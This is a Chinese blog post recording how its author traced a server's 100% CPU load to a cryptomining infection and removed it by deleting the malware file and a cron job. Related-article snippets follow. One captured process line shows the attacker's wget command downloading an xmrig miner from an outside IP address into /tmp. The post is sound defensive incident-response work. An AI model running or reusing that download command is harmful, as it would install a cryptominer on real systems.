linux一次进程cpu100记录

最新推荐文章于 2024-03-05 00:48:34 发布
原创 最新推荐文章于 2024-03-05 00:48:34 发布 · 883 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细记录了一次服务器遭遇挖矿病毒攻击的过程。通过使用top命令发现CPU占用异常,进一步利用ps命令和grep定位到病毒源wget下载的恶意文件。深入分析定时任务,最终删除病毒文件和定时任务,成功清除病毒。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近遇到一个问题,发现导致经常cpu爆满,导致tomcat,nginx等出现异常。

1、查看异常进程

top命令

2、查看PID对应的文件

ll /proc/PID/exe

3、通过ps命令得知文件来源

ps -ef | grep php

nobody   11036 10981  0 11:28 ?        00:00:00 wget -O /tmp/php http://91.201.42.5/xmrig_64?19517

4、由此知道是由wget 下载xmrig_64 这个文件生成了php这个病毒文件,百度之后发现是挖矿病毒,删除后还会自动生成。查找定时任务

ls /var/spool/cron

发现下面有一个nobody的文件,vi打开正是下载的东西,删除之后解决

 

Linxu系统服务管理,systemd知识/进程优先级/平均负载/php进程CPU100%怎么解决系列知识!
2302_78067597的博客
04-28 1228
进程执行时候是排队执行的,需要插队,要调整。进程重要性高,需要优先多分配CPU。调整优先级。#记住用途nice: 调整【程序运行时】的优先级 renice:调整【运行中的进程】的优先级区别:nice命令常用于修改未运行的程序再运行时的优先级,但是对于正在运行的进程,若想要修改优先级,就需要用到renice命令。衡量系统繁忙的一个综合性指标,主要是cpu/io的繁忙程度;在工作中非常常用。工作中非常的常用,具体是哪一个指标繁忙ps,top,sar看cpu
Linux进程的创建
pkusail的博客
03-19 442
本文主要通过自身实践,介绍了在Linux下进行进程创建的简单实例。 进程的一生 随着一句fork,一个新进程呱呱落地,但它这时只是老进程的一个克隆。 然后随着exec,新进程脱胎换骨,离家独立,开始了为人民服务的职业生涯。 人有生老病死,进程也一样:         –自然死亡,即运行到main函数的最后一个“}”,从容地离我们而去。         –自杀(自杀有
Linux系统CPU占用100%原因分析
Make
05-16 1205
top查看发现是几个php-fpm占用了 参考了一些方法无果: linux php-fpm进程 cpu占用过高 解决方法_whatday的博客-优快云博客_phpfpm占用cpu高 liunx服务器php-fpm占用CPU过高_二十二DF的博客-优快云博客 linux线上CPU100%排查 - 知乎 jstack 找不到这个功能 ... 后来在查看日志的时候发现了问题: 那些php进程pid出现在这,对应的站点程序文件也清楚了。 再看站点的日志: 原来...
linux系统怎么创建进程数,Linux创建进程数的限制
weixin_34620658的博客
04-28 447
Linux上创建进程据说消耗很少,这个一直是Linux的特点,于是就专门测试Linux创建进程的极限,测试代码如下://fork.c#include #include #include #include #define MAXPROCESS 65535 #define SLEEPTIME 60 int main(int argc, char **argv) {pid_t pid; int cou...
Linux基础之查看系统cpu内存进程等信息
weixin_34408624的博客
04-17 91
Linux系统信息 转载于:https://blog.51cto.com/lareinay/1916787
Linux 进程的创建
爱上小公举
11-28 592
目录 进程创建 fork()函数 fork返回值 fork写时拷贝 fork失败原因 fork用法 进程创建 Linux 中我们可以说一个进程就是一个PCB, 即 一个task_struct, 那么创建进程也就是创建PCB, 即是创建task_struct Linux 中说到进程创建, 就不得不提到 fork()函数. fork()在Lnux下是非常重要的一个函数 . ...
linux cpu占用100%排查
qq_34506014的博客
04-03 1519
步骤一、找到最耗CPU进程 工具:top 方法: 执行top -c ,显示进程运行信息列表 键入P (大写p),进程按照CPU使用率排序 图示: 线上服务CPU100%问题快速定位实战 如上图,最耗CPU进程PID为10765 步骤二:找到最耗CPU的线程 工具:top 方法: top -Hp 10765 ,显示一个进程的线程运行信息列表 键入P (大写p),线程按照CPU使用率排序 ...
linux下通过go语言获得系统进程cpu使用情况的方法
09-15
Linux环境下,获取系统进程CPU使用情况是监控系统性能的重要环节。Go语言作为一种强大的系统编程语言,提供了丰富的标准库,使得我们可以方便地调用操作系统接口。本篇文章将详细介绍如何使用Go语言结合Linux的`ps...
一次tomcat进程cpu占用过高的问题排查记录
01-20
本文主要记录一次tomcat进程,因TCP连接过多导致CPU占用过高的问题排查记录。 问题描述 linux系统下,一个tomcat web服务的cpu占用率非常高,top显示结果超过200%。请求无法响应。反复重启依然同一个现象。 问题...
Linux下如何查看某一进程CPU占用率
03-04
这里,`prev_utime` 和 `prev_stime` 分别表示上一次采样时的`utime` 和 `stime` 值。 #### 三、示例代码解析 下面是一个简单的C语言示例程序,用于演示如何读取`/proc/PID/stat`文件并计算进程CPU占用率: ```...
Linux系统cpu飙升到100%排查方案
小相探索IT世界
03-05 1203
Linux服务器CPU突然飙升到100%,这时候系统直接卡死,很多新手面对这种情况经常束手无策,本文就针对这个问题提出个人方案,希望能帮助到你们。
Linux ECS CPU满载100% TOP进程无法查看解决记录
热门推荐
kingwenjie的博客
05-31 1万+
一、阿里一台ECS测试服务器提示检查到挖矿程序运行。文件名为/usr/lib/libiacpkmn.so.3 影响:CUP进程100%持续满载二、处理方法1、通过阿里云盾杀掉及隔离进程文件  无效2、通过linux删除libiacpkmn.so.3 提示无权限!  # lsattr libiacpkmn.so.3   查看文件属性,发现写了i保护  # chattr -i libiacpkmn.s...
解决100进程莫名其妙逐渐挂掉的问题
认知 行动 坚持
03-24 9155
上周天遇到这样一个问题: 开启某操作后, 开启了100进程, 几分钟内, 这些进程逐渐全部挂掉了。 当时无法用root身份登录机器, 无法看到内核log信息。 蛋疼了一整天,  但这个问题几乎必须要在24:00前解决, 几乎是必须。 白天的思路是, 肯定要100进程才能快速做完啊。 而且之前在别的机器上, 也玩过200个进程同时跑的事。          找了好久, 都没有找到原因,
linuxCPU使用率达到100%的快速定位方式
rendongxingzhe的博客
12-30 3097
linuxCPU使用率达到100%的快速定位方式
Linux 监控统计一段时间内进程CPU变化
qq_38781075的博客
04-24 3921
描述 把某个进程占用的CPU写入文件中,以时间为序,再通过Excel绘图查看 Shell部分 #!/bin/bash # 括号前后要有空格,尤其是表达式,中间没有空格会被解析成一个字符串,表达式被看成字符串就是永真 if [ $# -lt 2 ] then echo xxx.sh 进程名 时间秒 exit fi # grep -v 后面接反向过滤的字符串,head拿到grep的第一行,awk打印第二参数,也就是ps的进程号 pid=`ps -ef | grep $1 | gre
Linux记录历史进程CPU占用量
fjh1997的博客
04-27 5760
sudo bash #切换到root用户 sudo apt-get install sysstat #安装sysstat pidstat -u 600 >/var/log/pidstats.log & disown $! # 后台运行并通过disown使其脱离ssh session控制
Linux下查看某个进程占用的CPU、内存
suojie的博客
04-04 1673
1、用top命令指定固定的PID top -p 10997 查询指定进程的PID ps -ef | grep zookeeper jim 10997 1959 0 12月14 pts/2 00:00:01 /usr/lib/jvm/java-8-oracle/bin/java -Dzookeeper.log.dir=. -Dzookeeper.root.logge...
linux 查看进程 cpu 历史
最新发布
03-13
例如,使用top -b -d 1 -p PID >> cpu.log,这样每隔一秒记录一次特定进程CPU使用情况。不过这种方法需要用户提前启动记录,无法查看过去的数据。 还有一种可能是使用ps命令定期抓取进程的状态,写入日志文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值